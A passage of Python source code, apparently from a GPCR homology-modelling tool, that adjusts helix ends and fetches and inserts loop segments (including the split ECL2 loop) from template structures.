delete_a = set() delete_ar = set() for ref_res, temp_res, align_res in zip(a.reference_dict[ref_seg],a.template_dict[temp_seg], a.alignment_dict[align_seg]): if a.template_dict[temp_seg][temp_res]=='x' and increase_offset==True: offset+=1 elif a.template_dict[temp_seg][temp_res]!='x': increase_offset = False if a.template_dict[temp_seg][temp_res]=='-' and self.main_structure.pdb_code.index not in ['6BQG','6BQH'] and ref_res!='1x36': continue if a.reference_dict[ref_seg][ref_res]=='x': if list(full_template_dict_seg.keys()).index(ref_res)<mid+offset: modifications['removed'][ref_seg][0].append(ref_res) else: modifications['removed'][ref_seg][1].append(ref_res) delete_r.add((ref_seg,ref_res)) delete_t.add((temp_seg,temp_res)) delete_a.add((align_seg,align_res)) delete_ar.add((ref_seg, ref_res.replace('x','.'))) elif a.template_dict[temp_seg][temp_res]=='x' or (temp_seg[0]=='T' and temp_res.replace('x','.') not in list(main_pdb_array[temp_seg])): if list(full_template_dict_seg.keys()).index(temp_res)<mid+offset: modifications['added'][temp_seg][0].append(temp_res) else: modifications['added'][temp_seg][1].append(temp_res) for i,ii in delete_r: del a.reference_dict[i][ii] for i,ii in delete_t: del a.template_dict[i][ii] for i,ii in delete_a: del a.alignment_dict[i][ii] for i,ii in delete_ar: try: del main_pdb_array[i][ii] except: pass if ref_seg[0]=='T' or ref_seg=='H8': if len(modifications['added'][ref_seg][0])>0: self.helix_ends[ref_seg][0] = modifications['added'][ref_seg][0][0] if len(modifications['added'][ref_seg][1])>0: self.helix_ends[ref_seg][1] = modifications['added'][ref_seg][1][-1] if len(modifications['removed'][ref_seg][0])>0: self.helix_ends[ref_seg][0] = parser.gn_indecer(modifications['removed'][ref_seg][0][-1], 'x', 1) if len(modifications['removed'][ref_seg][1])>0: self.helix_ends[ref_seg][1] = parser.gn_indecer(modifications['removed'][ref_seg][1][0], 'x', -1) if len(modifications['added'][ref_seg][0])>0: found_alt_start = False for struct in self.similarity_table: if struct!=main_structure: try: if skip_template and struct.pdb_code.index in self.templates_to_skip[ref_seg][0]: continue alt_helix_ends = self.fetch_struct_helix_ends_from_db(struct) protein_conf = ProteinConformation.objects.get(protein=struct.protein_conformation.protein.parent) if parser.gn_comparer(alt_helix_ends[ref_seg][0],self.helix_ends[ref_seg][0], protein_conf)<=0: all_keys = list(a.reference_dict[ref_seg].keys())[:len(modifications['added'][ref_seg][0])+4] ref_keys = [i for i in all_keys if i not in modifications['added'][ref_seg][0]] reference = parser.fetch_residues_from_array(main_pdb_array[ref_seg],ref_keys) template = parser.fetch_residues_from_pdb(struct,all_keys) superpose = sp.OneSidedSuperpose(reference,template,4,0) sup_residues = superpose.run() new_residues = OrderedDict() for gn, atoms in sup_residues.items(): gn_ = gn.replace('.','x') if gn_ not in ref_keys: new_residues[gn] = atoms a.template_dict[temp_seg][gn_] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[temp_seg][gn_]==a.reference_dict[ref_seg][gn_]: a.alignment_dict[ref_seg][gn_] = a.reference_dict[ref_seg][gn_] else: a.alignment_dict[ref_seg][gn_] = '.' for gn, atoms in main_pdb_array[ref_seg].items(): if gn not in new_residues: new_residues[gn] = atoms main_pdb_array[ref_seg] = new_residues self.update_template_source(modifications['added'][ref_seg][0],struct,ref_seg) found_alt_start = True break except: pass if found_alt_start==False: new_residues = OrderedDict() for i in modifications['added'][ref_seg][0]: new_residues[i.replace('x','.')] = 'x' a.template_dict[ref_seg][i] = 'x' a.alignment_dict[ref_seg][i] = 'x' for i,j in main_pdb_array[ref_seg].items(): new_residues[i] = j main_pdb_array[ref_seg] = new_residues if len(modifications['added'][ref_seg][1])>0: found_alt_end = False for struct in self.similarity_table: if struct!=main_structure: try: if skip_template and struct.pdb_code.index in self.templates_to_skip[ref_seg][1]: continue protein_conf = ProteinConformation.objects.get(protein=struct.protein_conformation.protein.parent) alt_helix_ends = self.fetch_struct_helix_ends_from_db(struct) if parser.gn_comparer(alt_helix_ends[ref_seg][1],self.helix_ends[ref_seg][1], protein_conf)>=0: all_keys = list(a.reference_dict[ref_seg].keys())[-1*(len(modifications['added'][ref_seg][1])+4):] ref_keys = [i for i in all_keys if i not in modifications['added'][ref_seg][1]] reference = parser.fetch_residues_from_array(main_pdb_array[ref_seg],ref_keys) template = parser.fetch_residues_from_pdb(struct,all_keys) superpose = sp.OneSidedSuperpose(reference,template,4,1) sup_residues = superpose.run() new_residues = OrderedDict() for gn, atoms in sup_residues.items(): if gn.replace('.','x') not in ref_keys: new_residues[gn]=atoms for gn, atoms in new_residues.items(): gn_ = gn.replace('.','x') if gn_ in modifications['added'][ref_seg][1]: main_pdb_array[ref_seg][gn] = atoms a.template_dict[ref_seg][gn_] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[ref_seg][gn_]==a.reference_dict[ref_seg][gn_]: a.alignment_dict[ref_seg][gn_] = a.reference_dict[ref_seg][gn_] else: a.alignment_dict[ref_seg][gn_] = '.' self.update_template_source(modifications['added'][ref_seg][1], struct,segment=ref_seg) found_alt_end = True break except: pass if found_alt_end==False: for i in modifications['added'][ref_seg][1]: main_pdb_array[ref_seg][i.replace('x','.')] = 'x' a.template_dict[ref_seg][i] = 'x' a.alignment_dict[ref_seg][i] = 'x' self.helix_end_mods = modifications self.main_pdb_array = main_pdb_array self.alignment = a return main_pdb_array, a class Loops(object): ''' Class to handle loops in GPCR structures. ''' def __init__(self, reference_protein, loop_label, loop_template_structures, main_structure, helix_end_mods, segment_order, revise_xtal): self.segment_order = segment_order if revise_xtal==True: ref_prot = reference_protein.parent else: ref_prot = reference_protein self.reference_protein = ref_prot self.prot_conf = ProteinConformation.objects.get(protein=ref_prot) self.loop_label = loop_label self.loop_template_structures = loop_template_structures self.main_structure = main_structure self.helix_end_mods = helix_end_mods self.loop_output_structure = None self.new_label = None self.aligned = False self.model_loop = False self.partialECL2_1 = False self.partialECL2_2 = False self.excluded_loops = {'ICL1':[],'ECL1':[],'ICL2':[],'ECL2':[],'ECL2_1':[],'ECL2_mid':[],'ECL2_2':[],'ICL3':['3VW7'],'ECL3':['4DJH']} self.evade_chain_break = False def fetch_loop_residues(self, main_pdb_array, superpose_modded_loop=False): ''' Fetch list of Atom objects of the loop when there is an available template. Returns an OrderedDict(). ''' if (self.loop_label=='ECL2' and (self.loop_template_structures==None or 'ECL2_mid' in self.loop_template_structures and self.loop_template_structures['ECL2_mid']==None)): return None if self.loop_template_structures!=None: ref_loop = list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug=self.loop_label)) parse = GPCRDBParsingPDB() seg_list = self.segment_order prev_seg = seg_list[seg_list.index(self.loop_label)-1] next_seg = seg_list[seg_list.index(self.loop_label)+1] if prev_seg=='C-term': orig_before_gns = [] else: orig_before_gns = [i.replace('.','x') for i in list(main_pdb_array[prev_seg].keys())[-4:]] orig_after_gns = [j.replace('.','x') for j in list(main_pdb_array[next_seg].keys())[:4]] if len(orig_before_gns)==0: last_before_gn = None else: last_before_gn = orig_before_gns[-1] first_after_gn = orig_after_gns[0] if self.loop_label=='ECL2': try: ref_res = Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug='ECL2') r_first = list(ref_res)[0].sequence_number r_last = list(ref_res)[-1].sequence_number r_x50 = ref_res.get(display_generic_number__label='45.50x50').sequence_number except: pass output = OrderedDict() if (self.loop_label=='ECL2' and 'ECL2_1' not in self.loop_template_structures) or self.loop_label!='ECL2' or superpose_modded_loop==True: for template in self.loop_template_structures: if self.loop_label=='ICL2' and template!='aligned' and template.pdb_code.index=='2RH1' and self.reference_protein.entry_name=='adrb2_human': continue output = OrderedDict() try: if (template==self.main_structure or template=='aligned') and superpose_modded_loop==False and template.pdb_code.index not in self.excluded_loops[self.loop_label]: if self.helix_end_mods!=None and (len(self.helix_end_mods['removed'][prev_seg][1])==0 and len(self.helix_end_mods['removed'][next_seg][0])==0 and len(self.helix_end_mods['added'][prev_seg][1])==0 and len(self.helix_end_mods['added'][next_seg][0])==0): if template=='aligned': self.aligned = True else: self.aligned = False try: l_res = self.compare_parent_loop_to_child(self.loop_label,template) if l_res==False: raise Exception() loop_res = [r.sequence_number for r in l_res[1]] at_least_one_gn = False x50_present, x50_temp_present = False, False for i in ref_loop: try: g = ggn(i.display_generic_number.label) at_least_one_gn = True if 'x50' in g: x50_present = True break except: pass for j in l_res[1]: try: g2 = ggn(j.display_generic_number.label) if 'x50' in g2: x50_temp_present = True except: pass if self.loop_template_structures[template]!=0: if x50_present==False and len(ref_loop)!=len(loop_res): continue elif x50_present==True and x50_temp_present==False and len(self.loop_template_structures)>1: continue partial = False else: partial = True if len(self.helix_end_mods['added'][prev_seg][1])!=0 or len(self.helix_end_mods['added'][next_seg][0])!=0: continue if at_least_one_gn==True: inter_array = parse.fetch_residues_from_pdb(self.main_structure,loop_res) else: inter_array = parse.fetch_residues_from_pdb(self.main_structure,loop_res, just_nums=True) self.loop_output_structure = self.main_structure if partial==False: for id_, atoms in inter_array.items(): output[str(id_)] = atoms else: p_c = ProteinConformation.objects.get(protein=self.main_structure.protein_conformation.protein.parent) p_loop_res = Residue.objects.filter(protein_conformation=p_c, protein_segment__slug=self.loop_label) for num in p_loop_res: try: output[str(num.sequence_number)] = inter_array[str(num.sequence_number)] except: output[str(num.sequence_number)] = '-' return output except: self.aligned = False continue else: # print('Warning: need to superpose aligned {}'.format(self.loop_label)) return self.fetch_loop_residues(main_pdb_array,superpose_modded_loop=True) else: if template.pdb_code.index in self.excluded_loops[self.loop_label]: continue if self.loop_label=='ICL4' and len(list(Residue.objects.filter(protein_conformation=self.prot_conf,protein_segment__slug='ICL4')))<3: raise Exception() if template=='aligned' or template==self.main_structure: template = self.main_structure self.aligned = True if superpose_modded_loop==True: self.model_loop = True alt_last_before_gn = last_before_gn b_num_found = False break_count = 0 while b_num_found==False and break_count<30: try: b_num = Residue.objects.get(protein_conformation=template.protein_conformation, display_generic_number__label=dgn(alt_last_before_gn, template.protein_conformation)).sequence_number b_num_found = True except: alt_last_before_gn = parse.gn_indecer(alt_last_before_gn,'x',-1) break_count+=1 alt_first_after_gn = first_after_gn a_num_found = False break_count = 0 while a_num_found==False and break_count<30: try: a_num = Residue.objects.get(protein_conformation=template.protein_conformation, display_generic_number__label=dgn(alt_first_after_gn, template.protein_conformation)).sequence_number a_num_found = True except: alt_first_after_gn = parse.gn_indecer(alt_first_after_gn,'x',1) break_count+=1 else: b_num = Residue.objects.get(protein_conformation=template.protein_conformation, display_generic_number__label=dgn(last_before_gn, template.protein_conformation)).sequence_number a_num = Residue.objects.get(protein_conformation=template.protein_conformation, display_generic_number__label=dgn(first_after_gn, template.protein_conformation)).sequence_number before4 = Residue.objects.filter(protein_conformation=template.protein_conformation, sequence_number__in=[b_num,b_num-1,b_num-2,b_num-3]) after4 = Residue.objects.filter(protein_conformation=template.protein_conformation, sequence_number__in=[a_num,a_num+1,a_num+2,a_num+3]) x50_present = False for i in ref_loop: try: if 'x50' in i.display_generic_number.label: x50_present = True except: pass if superpose_modded_loop==True and self.aligned==True: loop_residues = Residue.objects.filter(protein_conformation=template.protein_conformation, protein_segment__slug=self.loop_label) p_c_check = self.compare_parent_loop_to_child(self.loop_label,template) if p_c_check==False: raise Exception() else: del_from_loop = [] for i in loop_residues: if i not in p_c_check[1]: del_from_loop.append(i) loop_residues = [i for i in loop_residues if i not in del_from_loop] if (self.loop_label in ['ICL1','ECL1','ICL2'] and not x50_present and len(loop_residues)!=len(ref_loop)): raise Exception() else: loop_residues = Residue.objects.filter(protein_conformation=template.protein_conformation, protein_segment__slug=self.loop_label) loop_residues_test = Residue.objects.filter(protein_conformation=template.protein_conformation, protein_segment__slug=self.loop_label) p_c = ProteinConformation.objects.get(protein=template.protein_conformation.protein.parent) loop_residues_test_parent = Residue.objects.filter(protein_conformation=p_c, protein_segment__slug=self.loop_label) gn_nums_loop = [i for i in loop_residues if i.generic_number!=None and i.protein_segment.slug[0] not in ['T','H']] if self.loop_label in ['ICL1','ECL1','ICL2'] and x50_present==True: if len(gn_nums_loop)==0 or len(gn_nums_loop)<len([i for i in ref_loop if i.generic_number!=None and i.protein_segment.slug[0] not in ['T','H']]): continue else: loop_residues = loop_residues_test if len(loop_residues_test)!=len(loop_residues_test_parent): continue before_gns = [x.sequence_number for x in before4] mid_nums = [x.sequence_number for x in loop_residues] after_gns = [x.sequence_number for x in after4] alt_residues = parse.fetch_residues_from_pdb(template, before_gns+mid_nums+after_gns) orig_residues1 = parse.fetch_residues_from_array(main_pdb_array[prev_seg],orig_before_gns) orig_residues2 = parse.fetch_residues_from_array(main_pdb_array[next_seg],orig_after_gns) orig_residues = parse.add_two_ordereddict(orig_residues1,orig_residues2) superpose = sp.LoopSuperpose(orig_residues, alt_residues) new_residues = superpose.run() key_list = list(new_residues.keys())[4:-4] for key in key_list: output[key] = new_residues[key] self.loop_output_structure = template return output except: self.aligned = False continue else: output,ECL2_1,ECL2_mid,ECL2_2 = OrderedDict(),OrderedDict(),OrderedDict(),OrderedDict() no_first_temp, no_second_temp = True,True main_temp_seq = Residue.objects.filter(protein_conformation=self.main_structure.protein_conformation, protein_segment__slug=self.loop_label) cp = self.compare_parent_loop_to_child(self.loop_label, self.main_structure) try: if cp[0]==True: main_temp_seq = cp[1] except: pass for mid_template in self.loop_template_structures['ECL2_mid']: ref_ECL2_res = Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='ECL2') ref_ECL2_45x50 = ref_ECL2_res.get(display_generic_number__label='45.50x50') ref_ECL2_2_res = [i for i in ref_ECL2_res if i.sequence_number>ref_ECL2_45x50.sequence_number+2] if type(main_temp_seq)==type([]): temp_ECL2_45x50 = [i for i in main_temp_seq if i.display_generic_number!=None and i.display_generic_number.label=='45.50x50'][0] else: temp_ECL2_45x50 = main_temp_seq.get(display_generic_number__label='45.50x50') temp_ECL2_2_res = [i for i in main_temp_seq if i.sequence_number>temp_ECL2_45x50.sequence_number+2] if len(temp_ECL2_2_res)>len(ref_ECL2_2_res) and len(ref_ECL2_2_res)<2: self.evade_chain_break = True if mid_template==self.main_structure: ECL2_mid = parse.fetch_residues_from_pdb(self.main_structure,['45x50','45x51','45x52']) try: x50 = [i.sequence_number for i in main_temp_seq if i.display_generic_number!=None and i.display_generic_number.label=='45.50x50'][0] except: x50 = main_temp_seq.get(display_generic_number__label='45.50x50').sequence_number break else: try: ECL2_mid = parse.fetch_residues_from_pdb(mid_template,[last_before_gn,first_after_gn,'3x25', '45x50','45x51','45x52']) ref_ECL2_mid1 = parse.fetch_residues_from_array(main_pdb_array['TM4'],[last_before_gn]) ref_ECL2_mid2 = parse.fetch_residues_from_array(main_pdb_array['TM5'],[first_after_gn]) ref_ECL2_mid3 = parse.fetch_residues_from_array(main_pdb_array['TM3'],['3x25']) ref_ECL2_mid = parse.add_two_ordereddict(parse.add_two_ordereddict(ref_ECL2_mid1, ref_ECL2_mid2), ref_ECL2_mid3) superpose = sp.ECL2MidSuperpose(ref_ECL2_mid,ECL2_mid) new_mid_residues = superpose.run() ECL2_mid = OrderedDict() for i,j in new_mid_residues.items(): if i in ['45.50','45.51','45.52']: ECL2_mid[i] = j break except: continue o1 = parse.fetch_residues_from_array(main_pdb_array[prev_seg],orig_before_gns) orig_residues1 = parse.add_two_ordereddict(o1,ECL2_mid) if self.loop_template_structures['ECL2_1']==None: no_first_temp=True else: for first_temp in self.loop_template_structures['ECL2_1']: if first_temp.pdb_code.index in self.excluded_loops['ECL2_1']: continue if first_temp==self.main_structure: try: ECL2_1 = parse.fetch_residues_from_pdb(self.main_structure, list(range(list(main_temp_seq)[0].sequence_number,x50))) no_first_temp=False break except: try: partial_seq1 = Residue.objects.filter(protein_conformation=first_temp.protein_conformation, sequence_number__in=list(range(list(main_temp_seq)[0].sequence_number,x50))) partial_seq1_nums = [i.sequence_number for i in partial_seq1] ECL2_1 = parse.fetch_residues_from_pdb(first_temp, partial_seq1_nums) no_first_temp=False self.partialECL2_1 = True break except: continue else: try: b_num = Residue.objects.get(protein_conformation=first_temp.protein_conformation, display_generic_number__label=dgn(last_before_gn, first_temp.protein_conformation)).sequence_number before4 = Residue.objects.filter(protein_conformation=first_temp.protein_conformation, sequence_number__in=[b_num,b_num-1,b_num-2,b_num-3]) alt_mid1 = Residue.objects.filter(protein_conformation=first_temp.protein_conformation, protein_segment__slug=self.loop_label, display_generic_number__label__in=['45.50x50','45.51x51','45.52x52']) alt1_x50 = alt_mid1.get(display_generic_number__label='45.50x50').sequence_number loop_res1 = Residue.objects.filter(protein_conformation=first_temp.protein_conformation, sequence_number__in=list(range(b_num+1, alt1_x50))).filter(protein_segment__slug=self.loop_label) before_gns = [x.sequence_number for x in before4] mid_gns1 = [x.sequence_number for x in loop_res1] alt_residues1 = parse.fetch_residues_from_pdb(first_temp,before_gns+mid_gns1+['45x50','45x51','45x52']) superpose = sp.LoopSuperpose(orig_residues1,alt_residues1,ECL2=True,part=1) new_residues = superpose.run() key_list = list(new_residues.keys())[4:-3] for key in key_list: ECL2_1["1_"+key] = new_residues[key] no_first_temp=False break except: no_first_temp=True if no_first_temp==True: for i in range(1,r_x50-r_first+1): ECL2_1['1_'+str(i)]='x' first_temp=None o2 = parse.fetch_residues_from_array(main_pdb_array[next_seg],orig_after_gns) orig_residues2 = parse.add_two_ordereddict(ECL2_mid,o2) if self.loop_template_structures['ECL2_2']==None: no_second_temp=True else: for second_temp in self.loop_template_structures['ECL2_2']: if second_temp.pdb_code.index in self.excluded_loops['ECL2_2']: continue if second_temp==self.main_structure: try: ECL2_2 = parse.fetch_residues_from_pdb(self.main_structure,list(range(x50+3,list(main_temp_seq)[-1].sequence_number+1))) no_second_temp=False break except: try: partial_seq2 = Residue.objects.filter(protein_conformation=second_temp.protein_conformation, sequence_number__in=list(range(x50+3,list(main_temp_seq)[-1].sequence_number+1))) partial_seq2_nums = [i.sequence_number for i in partial_seq2] ECL2_2 = parse.fetch_residues_from_pdb(second_temp, partial_seq2_nums) no_second_temp=False self.partialECL2_2 = True break except: continue else: try: a_num = Residue.objects.get(protein_conformation=second_temp.protein_conformation, display_generic_number__label=dgn(first_after_gn, second_temp.protein_conformation)).sequence_number after4 = Residue.objects.filter(protein_conformation=second_temp.protein_conformation, sequence_number__in=[a_num,a_num+1,a_num+2,a_num+3]) alt_mid2 = Residue.objects.filter(protein_conformation=second_temp.protein_conformation, protein_segment__slug=self.loop_label, display_generic_number__label__in=['45.50x50','45.51x51','45.52x52']) alt2_x50 = alt_mid2.get(display_generic_number__label='45.50x50').sequence_number loop_res2 = Residue.objects.filter(protein_conformation=second_temp.protein_conformation, sequence_number__in=list(range(alt2_x50+3, a_num))).filter(protein_segment__slug=self.loop_label) mid_gns2 = [x.sequence_number for x in loop_res2] after_gns = [x.sequence_number for x in after4] alt_residues2 = parse.fetch_residues_from_pdb(second_temp,['45x50','45x51','45x52']+mid_gns2+after_gns) superpose = sp.LoopSuperpose(orig_residues2,alt_residues2,ECL2=True,part=2) new_residues = superpose.run() key_list = list(new_residues.keys())[3:-4] for key in key_list: ECL2_2["2_"+key] = new_residues[key] no_second_temp=False break except: no_second_temp=True if no_second_temp==True: for j in range(1,r_last-r_x50-1): ECL2_2['2_'+str(j)]='x' second_temp=None output['ECL2_1'] = ECL2_1 output['ECL2_mid'] = ECL2_mid output['ECL2_2'] = ECL2_2 self.loop_output_structure = [first_temp,mid_template,second_temp] return output if len(output.keys())==0: return None else: return None def insert_loop_to_arrays(self, loop_output_structure, main_pdb_array, loop_template, reference_dict, template_dict, alignment_dict): ''' Updates the homology model with loop segments. Inserts previously fetched lists of loop Atom objects to the proper arrays, dictionaries. @param loop_output_structure: Structure object of loop template. @param main_pdb_array: nested OrderedDict(), output of GPCRDBParsingPDB().pdb_array_creator(). @param loop_template: OrderedDict() of loop template with lists of Atom objects as values. @param reference_dict: reference dictionary of AlignedReferenceTemplate. @param template_dict: template dictionary of AlignedReferenceTemplate. @param alignment_dict: alignment dictionary of AlignedReferenceTemplate. ''' shorter_ref, shorter_temp = False, False try: for r,t in zip(reference_dict[self.loop_label],template_dict[self.loop_label]): if reference_dict[self.loop_label][r] in ['-','x']: shorter_ref = True self.model_loop = True elif template_dict[self.loop_label][t] in ['-','x']: shorter_temp = True self.model_loop = True except: pass if loop_template!=None and loop_output_structure!=self.main_structure: loop_keys = list(loop_template.keys())[1:-1] continuous_loop = False self.main_pdb_array = self.discont_loop_insert_to_pdb(main_pdb_array, loop_template, loop_output_structure, temp_dict=template_dict) elif loop_template!=None and loop_output_structure==self.main_structure or self.aligned==True and (shorter_ref==True or shorter_temp==True): loop_keys = list(loop_template.keys()) continuous_loop = True temporary_dict = OrderedDict() # correct for partial loops try: query_temp_dict = template_dict[self.loop_label] except: query_temp_dict = OrderedDict() parent_loop = Residue.objects.filter(protein_conformation__protein=loop_output_structure.protein_conformation.protein.parent, protein_segment__slug=self.loop_label) for i in parent_loop: query_temp_dict[str(i.sequence_number)] = '-' try: if len(loop_keys)<len(query_temp_dict): counter=0 for i in query_temp_dict: if i.replace('x','.') in loop_keys: temporary_dict[i.replace('x','.')] = loop_template[i.replace('x','.')] else: temporary_dict['gap{}'.format(str(counter))] = '-' counter+=1 loop_template = temporary_dict except: pass self.main_pdb_array = self.cont_loop_insert_to_pdb(main_pdb_array, template_dict, loop_template) else: self.main_pdb_array = main_pdb_array if loop_template!=None: temp_ref_dict, temp_temp_dict, temp_aligned_dict = OrderedDict(),OrderedDict(),OrderedDict() if continuous_loop==True: if shorter_ref==True and shorter_temp==False: ref_residues = list(reference_dict[self.loop_label].values()) elif shorter_ref==True and shorter_temp==True: ref_residues = list(reference_dict[self.loop_label].values()) elif shorter_ref==False and shorter_temp==True: ref_residues = list(reference_dict[self.loop_label].values()) else: ref_residues = [x.amino_acid for x in Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug=self.loop_label)] else: try: ref_residues = list(reference_dict[self.loop_label].values()) except: ref_residues = list(Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug=self.loop_label)) for ref_seg, temp_seg, aligned_seg in zip(reference_dict, template_dict, alignment_dict): if ref_seg[0]=='T' and self.segment_order.index(self.loop_label)-self.segment_order.index(ref_seg[:4])==1: temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] input_residues = list(loop_template.keys()) ref_loop_seg, temp_loop_seg, aligned_loop_seg = OrderedDict(),OrderedDict(),OrderedDict() if continuous_loop==True: l_res=0 for r_res, r_id in zip(ref_residues, input_residues): l_res+=1 try: loop_gn = ggn(Residue.objects.get(protein_conformation=self.main_structure.protein_conformation, display_generic_number__label=dgn(r_id.replace('.','x'), self.main_structure.protein_conformation)).display_generic_number.label) except: try: Residue.objects.get(protein_conformation=self.main_structure.protein_conformation, sequence_number=r_id) loop_gn = self.loop_label+'|'+str(l_res) except: loop_gn = self.loop_label+'?'+str(l_res) ref_loop_seg[loop_gn] = r_res try: temp_loop_seg[loop_gn] = PDB.Polypeptide.three_to_one(loop_template[r_id][0].get_parent().get_resname()) except: temp_loop_seg[loop_gn] = '-' if ref_loop_seg[loop_gn]==temp_loop_seg[loop_gn]: aligned_loop_seg[loop_gn] = ref_loop_seg[loop_gn] elif ref_loop_seg[loop_gn]=='-' or temp_loop_seg[loop_gn]=='-': aligned_loop_seg[loop_gn] = '-' else: aligned_loop_seg[loop_gn] = '.' self.new_label = self.loop_label+'_cont' temp_ref_dict[self.loop_label+'_cont'] = ref_loop_seg temp_temp_dict[self.loop_label+'_cont'] = temp_loop_seg temp_aligned_dict[self.loop_label+'_cont'] = aligned_loop_seg else: missing_indeces = [] try: if len(list(template_dict[self.loop_label].keys()))<len(input_residues): for i in input_residues: try: template_dict[self.loop_label][i.replace('.','x')] except: missing_indeces.append([i,input_residues.index(i)]) temp_ref_residues = [] for i in range(len(ref_residues)): for j in missing_indeces: if i==j[1]: temp_ref_residues.append(j[0]) temp_ref_residues.append(ref_residues[i]) ref_residues = temp_ref_residues if len(list(template_dict[self.loop_label].keys()))<len(input_residues): for j in missing_indeces: if j[1]>=len(ref_residues): ref_residues.append[j[0]] elif len(list(template_dict[self.loop_label].keys()))>len(input_residues): for i in list(template_dict[self.loop_label].keys()): try: input_residues.index(i.replace('x','.')) except: missing_indeces.append([i,list(template_dict[self.loop_label].keys()).index(i)]) temp_input_residues = [] if self.loop_label in ['ICL1', 'ECL1', 'ICL2']: for i in range(0,len(list(template_dict[self.loop_label].keys()))): gap_inserted = False for j in missing_indeces: if i==j[1]: temp_input_residues.append(j[0]) gap_inserted = True break if gap_inserted==False: temp_input_residues.append(list(template_dict[self.loop_label])[i].replace('x','.')) input_residues = temp_input_residues if len(list(template_dict[self.loop_label].keys()))>len(input_residues): for j in missing_indeces: if j[1]>=len(input_residues): input_resi else: for i in range(len(input_residues)): for j in missing_indeces: if i==j[1]: temp_input_residues.append(j[0]) temp_input_residues.append(input_residues[i]) input_residues = temp_input_residues if len(list(template_dict[self.loop_label].keys()))>len(input_residues): for j in missing_indeces: if j[1]>=len(input_residues): input_residues.append(j[0]) except: pass loop_ends = [] start_found, end_found = False, False for i in range(len(ref_residues)): if ref_residues[i]!='x' and start_found==False: loop_ends.append(i) start_found = True if ref_residues[(i+1)*-1]!='x' and end_found==False: loop_ends.append((i+1)*-1) end_found = True if start_found and end_found: break l_res=0 temp_pdb_dict = OrderedDict() for r_res, r_id in zip(ref_residues, input_residues): if l_res==loop_ends[0] or len(ref_residues)+loop_ends[1]==l_res: try: ref_loop_seg[self.loop_label+'?'+str(l_res+1)] = ref_residues[l_res].amino_acid except: ref_loop_seg[self.loop_label+'?'+str(l_res+1)] = ref_residues[l_res] temp_loop_seg[self.loop_label+'?'+str(l_res+1)] = 'x' aligned_loop_seg[self.loop_label+'?'+str(l_res+1)] = 'x' temp_pdb_dict[self.loop_label+'?'+str(l_res+1)] = 'x' l_res+=1 continue l_res+=1 try: try: loop_gn = ggn(Residue.objects.get(protein_conformation=loop_output_structure.protein_conformation, display_generic_number__label=dgn(r_id.replace('.','x'), loop_output_structure.protein_conformation)).display_generic_number.label) ggn(Residue.objects.get(protein_conformation=self.prot_conf, display_generic_number__label=dgn(loop_gn, self.prot_conf)).display_generic_number.label) except: loop_gn = ggn(Residue.objects.get(protein_conformation=loop_output_structure.protein_conformation, sequence_number=r_id).display_generic_number.label) if len(loop_gn.split('x')[0])==1: raise Exception() except: try: if template_dict[self.loop_label][r_id.replace('.','x')] in ['x','-'] or r_res=='x': loop_gn = self.loop_label+'?'+str(l_res) else: raise Exception() except: loop_gn = self.loop_label+'|'+str(l_res) try: ref_loop_seg[loop_gn] = r_res.amino_acid except: ref_loop_seg[loop_gn] = r_res try: temp_loop_seg[loop_gn] = PDB.Polypeptide.three_to_one(loop_template[r_id][0].get_parent().get_resname()) except: temp_loop_seg[loop_gn] = '-' if ref_loop_seg[loop_gn]==temp_loop_seg[loop_gn]: aligned_loop_seg[loop_gn] = ref_loop_seg[loop_gn] else: aligned_loop_seg[loop_gn] = '.' try: temp_pdb_dict[loop_gn.replace('x','.')] = loop_template[r_id] except: temp_pdb_dict[loop_gn.replace('x','.')] = '-' self.new_label = self.loop_label+'_dis' temp_ref_dict[self.new_label] = ref_loop_seg temp_temp_dict[self.new_label] = temp_loop_seg temp_aligned_dict[self.new_label] = aligned_loop_seg self.main_pdb_array[self.new_label] = temp_pdb_dict else: temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] self.reference_dict = temp_ref_dict self.template_dict = temp_temp_dict self.alignment_dict = temp_aligned_dict try: del self.reference_dict[self.loop_label] del self.template_dict[self.loop_label] del self.alignment_dict[self.loop_label] except: pass else: self.reference_dict = reference_dict self.template_dict = template_dict self.alignment_dict = alignment_dict try: del self.reference_dict[self.loop_label] del self.template_dict[self.loop_label] del self.alignment_dict[self.loop_label] except: pass return self def insert_ECL2_to_arrays(self, loop_output_structure, main_pdb_array, loop_template, reference_dict, template_dict, alignment_dict, partialECL2_1=False, partialECL2_2=False): temp_array = OrderedDict() parent = ProteinConformation.objects.get(protein=loop_output_structure[1].protein_conformation.protein.parent) seq = list(Residue.objects.filter(protein_conformation=parent, protein_segment__slug='ECL2')) x50 = [i for i in seq if i.generic_number!=None and i.generic_number.label=='45x50'][0] x50_i = seq.index(x50) # first part if loop_output_structure[0]!=None: if loop_output_structure[0]==self.main_structure: temp_array = self.cont_loop_insert_to_pdb(main_pdb_array, template_dict, loop_template['ECL2_1'], ECL2='', x50_i=x50_i) else: ref_seq1 = list(Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug='ECL2')) ref_x50 = [i for i in ref_seq1 if i.generic_number!=None and i.generic_number.label=='45x50'][0] ref_x50i = ref_seq1.index(ref_x50) if loop_output_structure[0]!=loop_output_structure[1]: parent = ProteinConformation.objects.get(protein=loop_output_structure[0].protein_conformation.protein.parent) seq = list(Residue.objects.filter(protein_conformation=parent, protein_segment__slug='ECL2')) t_dict1 = OrderedDict([('ECL2',OrderedDict())]) for i in seq[:ref_x50i]: # if i.sequence_number<x50.sequence_number: t_dict1['ECL2']['1_'+str(i.sequence_number)] = '-' temp_array = self.discont_loop_insert_to_pdb(main_pdb_array, loop_template['ECL2_1'], loop_output_structure, ECL2='', temp_dict=t_dict1) else: temp_array = self.gap_ECL2(main_pdb_array,loop_template['ECL2_1'],break_chain=True) # middle part for key, res in loop_template['ECL2_mid'].items(): temp_array['ECL2'][key] = res # second part l_res = len(temp_array['ECL2']) if loop_output_structure[2]!=None: if 